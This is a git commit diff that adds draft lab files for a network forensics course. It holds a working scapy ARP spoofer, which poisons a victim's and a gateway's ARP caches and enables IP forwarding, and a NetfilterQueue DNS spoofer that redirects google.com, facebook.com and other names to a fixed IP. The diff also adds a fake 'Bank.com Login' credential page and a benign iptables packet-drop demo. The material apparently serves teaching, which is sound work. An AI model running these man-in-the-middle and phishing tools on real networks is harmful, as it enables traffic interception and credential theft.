add networking forensics draft. incompleted!

Networking_Forensics/lab_files/dns_spoof/arp.py

@@ -0,0 +1,93 @@
+# https://www.geeksforgeeks.org/python-how-to-create-an-arp-spoofer-using-scapy/
+# https://www.thepythoncode.com/article/building-arp-spoofer-using-scapy
+
+import scapy.all as scapy
+import time
+import argparse
+import time
+import os
+import sys
+
+def get_mac(ip):
+	arp_request = scapy.ARP(pdst = ip)
+	broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff")
+	arp_request_broadcast = broadcast / arp_request
+	answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
+	return answered_list[0][1].hwsrc
+
+def spoof(target_ip, host_ip, verbose=True):
+    """
+    Kali tells `target_ip` saying that "I have the host_ip that you want to talk". 
+    However, Kali provides its own Mac address.
+    In target's arp:
+    Host IP, attacker's/Kali Mac address
+    """
+    packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip),
+															psrc = host_ip)
+    scapy.send(packet, verbose = False)
+    
+    if verbose:
+        # get the MAC address of the default interface we are using
+        self_mac = scapy.ARP().hwsrc
+        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
+
+
+def restore(destination_ip, source_ip):
+	destination_mac = get_mac(destination_ip)
+	source_mac = get_mac(source_ip)
+	packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)
+	scapy.send(packet, verbose = False)
+ 
+ 
+def _enable_linux_iproute():
+    """
+    Enables IP route ( IP Forward ) in linux-based distro
+    """
+    file_path = "/proc/sys/net/ipv4/ip_forward"
+    with open(file_path) as f:
+        if f.read() == 1:
+            # already enabled
+            return
+    with open(file_path, "w") as f:
+        print(1, file=f) 
+        
+   
+def enable_ip_route(verbose=True):
+    """
+    Enables IP forwarding
+    """
+    if verbose:
+        print("[!] Enabling IP Routing...")
+        _enable_linux_iproute()
+    if verbose:
+        print("[!] IP Routing enabled.")
+	
+if __name__ == "__main__":
+    # Get the command-line arguments
+    args = sys.argv
+    
+    # victim ip address
+    target = args[1]
+    # gateway ip address
+    host = args[2]
+    # print progress to the screen
+    verbose = True
+    # enable ip forwarding
+    enable_ip_route()
+    try:
+        sent_packets_count = 0
+        while True:
+            # telling the `target` that we are the `host`
+            spoof(target, host, verbose)
+            # telling the `host` that we are the `target`
+            spoof(host, target, verbose)
+            
+            sent_packets_count = sent_packets_count + 2
+            print("\r[*] Packets Sent "+str(sent_packets_count), end ="")
+            # sleep for two second
+            time.sleep(3)
+    except KeyboardInterrupt:
+        print("[!] Detected CTRL+C ! restoring the network, please wait...")
+        restore(target, host)
+        restore(host, target)
+        print("[+] Arp Spoof Stopped")

Networking_Forensics/lab_files/dns_spoof/dns_spoof.py

@@ -0,0 +1,64 @@
+# https://www.geeksforgeeks.org/how-to-make-a-dns-spoof-attack-using-scapy-in-python/
+# https://www.thepythoncode.com/article/make-dns-spoof-python
+import os
+import logging as log
+from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
+from netfilterqueue import NetfilterQueue
+
+
+class DnsSnoof:
+	def __init__(self, hostDict, queueNum):
+		self.hostDict = hostDict
+		self.queueNum = queueNum
+		self.queue = NetfilterQueue()
+
+	def __call__(self):
+		log.info("Snoofing....")
+		os.system(
+			f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+		self.queue.bind(self.queueNum, self.callBack)
+		try:
+			self.queue.run()
+		except KeyboardInterrupt:
+			os.system(
+				f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+			log.info("[!] iptable rule flushed")
+
+	def callBack(self, packet):
+		scapyPacket = IP(packet.get_payload())
+		if scapyPacket.haslayer(DNSRR):
+			try:
+				log.info(f'[original] { scapyPacket[DNSRR].summary()}')
+				queryName = scapyPacket[DNSQR].qname
+				if queryName in self.hostDict:
+					scapyPacket[DNS].an = DNSRR(
+						rrname=queryName, rdata=self.hostDict[queryName])
+					scapyPacket[DNS].ancount = 1
+					del scapyPacket[IP].len
+					del scapyPacket[IP].chksum
+					del scapyPacket[UDP].len
+					del scapyPacket[UDP].chksum
+					log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
+				else:
+					log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
+			except IndexError as error:
+				log.error(error)
+			packet.set_payload(bytes(scapyPacket))
+		return packet.accept()
+
+
+if __name__ == '__main__':
+	try:
+		hostDict = {
+			b"google.com.": "136.160.215.15",
+			b"facebook.com.": "136.160.215.15",
+   			b"ubalt.com.": "136.160.215.15",
+      		b"g00gle.com.": "136.160.215.15",
+		}
+		queueNum = 1
+		log.basicConfig(format='%(asctime)s - %(message)s',
+						level = log.INFO)
+		snoof = DnsSnoof(hostDict, queueNum)
+		snoof()
+	except OSError as error:
+		log.error(error)

Networking_Forensics/lab_files/dns_spoof/index.html

@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Bank.com Login</title>
+</head>
+
+<body>
+    <h1>Bank.com Login</h1>
+    <form action="#" method="post">
+        <label for="username">Username:</label>
+        <input type="text" id="username" name="username" required><br><br>
+
+        <label for="password">Password:</label>
+        <input type="password" id="password" name="password" required><br><br>
+
+        <input type="submit" value="Login">
+    </form>
+</body>
+
+</html>

Networking_Forensics/lab_files/firewall/hello.html

@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Hello World</title>
+</head>
+
+<body>
+    <h1>Hello World! Network Forensics. </h1>
+    <p>Welcome to my simple web page.</p>
+</body>
+
+</html>

Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py

@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+
+import argparse
+import os
+import signal
+import sys
+
+from netfilterqueue import NetfilterQueue
+from scapy.layers.inet import IP
+from scapy.sendrecv import send
+
+
+def iptables_add_rule(ip_address):
+    os.system(f"iptables -A INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
+
+
+def iptables_remove_rule(ip_address):
+    os.system(f"iptables -D INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
+
+
+def handle_packet(packet):
+    ip = IP(packet.get_payload())
+    source_ip = ip.src
+    print(f"Receiving packet from {source_ip}")
+
+    if source_ip == args.source_ip:
+        print(f"Dropping packet from {source_ip}")
+        packet.drop()
+        print("================================")
+
+def parse_arguments():
+    parser = argparse.ArgumentParser(description="Python script to demonstrate iptables functions")
+    parser.add_argument("source_ip", help="Source IP address to filter")
+    return parser.parse_args()
+
+
+def main():
+    if os.geteuid() != 0:
+        print("You must be root to run this script.")
+        sys.exit(1)
+
+    global args
+    args = parse_arguments()
+
+    iptables_add_rule(args.source_ip)
+
+    q = NetfilterQueue()
+    q.bind(1, handle_packet)
+
+    try:
+        print("Waiting incoming packets...")
+        q.run()
+    except KeyboardInterrupt:
+        print("Exiting...")
+        q.unbind()
+        iptables_remove_rule(args.source_ip)
+        print("Rules are removed...")
+
+
+if __name__ == "__main__":
+    main()

Networking_Forensics/lab_files/firewall_forward/hello.html

@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>Hello World</title>
+</head>
+
+<body>
+    <h1>Hello World! Network Forensics. </h1>
+    <p>Welcome to my simple web page.</p>
+</body>
+
+</html>